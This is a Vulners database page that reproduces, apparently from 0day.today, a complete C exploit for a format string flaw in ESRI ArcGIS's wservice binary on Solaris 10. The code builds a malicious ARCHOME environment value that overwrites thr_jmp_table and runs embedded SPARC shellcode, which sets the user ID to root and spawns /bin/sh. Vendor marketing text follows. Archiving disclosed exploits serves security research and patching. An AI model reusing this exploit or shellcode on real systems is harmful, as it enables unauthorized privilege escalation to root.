Vulners
Lucene search
Solaris 10.x ESRI Arcgis Local Root Format String Exploit
=========================================================
Solaris 10.x ESRI Arcgis Local Root Format String Exploit
=========================================================
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <[email protected]>
** Exploit by John H. <[email protected]>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP "\xa2\x1c\x40\x11"
int iType;
struct
{
unsigned long retloc;
unsigned long retaddr;
char *type;
}targets[] =
{
/* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
0003a234 d thr_jmp_table
*/
{0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
{0x41424344,0x41424344,"DEBUG"},
},v;
//shellcode taken from netric
char shellcode[] =
"55"
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
// setreuid(0,0);
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x10\x20\xca" // mov 0xca, %g1
"\x91\xd0\x20\x08" // ta 8
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\xcb" // mov 0x2e, %g1
"\x91\xd0\x20\x08" // ta 8 [setregid(0,0)]
"\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
"\xa0\x14\x21\x76" // or %l0, 0x176, %l0
"\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
"\xa2\x14\x60\x79" // or %l1, 0x79, %l1
"\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
"\x90\x23\xa0\x08" // sub %sp, 8, %o0
"\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
"\x82\x10\x20\x05" // mov 0x05, %g1
"\x91\xd0\x20\x08" // ta 8 [open("/dev/tty",RD_ONLY)]
"\x90\x10\x20\x02" // mov 0x02, %o0
"\x82\x10\x20\x29" // mov 0x29, %g1
"\x91\xd0\x20\x08" // ta 8 [dup(2)]
"\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
"\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
"\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
"\xa2\x14\x63\x68" // or %l1, 0x368, %l1
"\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
"\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
"\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
"\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
"\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
"\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
"\x94\x22\x80\x0a" // sub %o2, %o2, %o2
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x08" // ta 8 [execve("/bin/sh","/bin/sh",NULL)]
"\x82\x10\x20\x01" // mov 0x01, %g1
"\x91\xd0\x20\x08" // ta 8 [exit(?)]
"\x10\xbf\xff\xdf" // b shellcode
"\x90\x1d\x80\x16"; // or %o1, %o1, %o1
/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 24) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 0) & 0xff;
return ptr;
}
/* main */
int main(int argc, char **argv)
{
unsigned long retaddr;
unsigned long retloc;
int offset = 23;
int dump_fmt=129;
int al = 1;
int i=0;
int x=0;
int c;
unsigned long hi,lo;
static unsigned long shift0,shift1;
char buf[9000];
char *args[24];
char *env[6];
char *ptr;
char padding[64];
char padding1[64];
char buf2[9000];
if (argc < 3) {
usage (argv[0]);
return -1;
}
while((c = getopt(argc, argv, "h:t:")) != EOF) {
switch(c) {
case 'h':
usage (argv[0]);
return 0;
case 't':
iType = atoi (optarg);
break;
default:
usage (argv[0]);
return 0;
}
}
if (argc < 2) { usage(argv[0]); exit(1); }
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return 0;
}
env[0] = shellcode;
env[1] = buf2;
env[2] = NULL;
args[0] = VULPROG;
args[1] = NULL;
retloc = targets[iType].retloc;
retaddr = targets[iType].retaddr;
hi = (retaddr >> 16) & 0xffff;
lo = (retaddr >> 0) & 0xffff;
shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
shift1 = (0x10000 + lo) - hi;
memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2));
ptr = buf;
for (i = 0; i < al; i++) {
*ptr++ = 0x41;
}
ptr = putLong (ptr, 0x41414141);
ptr = putLong (ptr, retloc);
ptr = putLong (ptr, 0x42424242);
ptr = putLong (ptr, retloc+2);
for (i = 0 ; i < dump_fmt; i ++) {
memcpy(ptr, "%.8x", 4);
ptr = ptr + 4;
}
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift0);
strcat(ptr,"lx%hn");
strcat(ptr,"%.");
sprintf(ptr+strlen(ptr),"%u",shift1);
strcat(ptr,"lx%hn");
strcat(buf2,"ARCHOME=");
memcpy(buf2+strlen(buf2),buf,strlen(buf));
execve (args[0], args, env);
perror ("execve");
return 0;
}
int usage(char *p)
{
int i;
printf( "Arcgis local root format string exploit\r\n");
printf( "Usage: %s <-t target>\n",p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("%d\t%s\n", i, targets[i].type);
}
return 0;
}
# 0day.today [2018-03-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Apr 2004 00:00Current
6.8Medium risk
Vulners AI Score6.8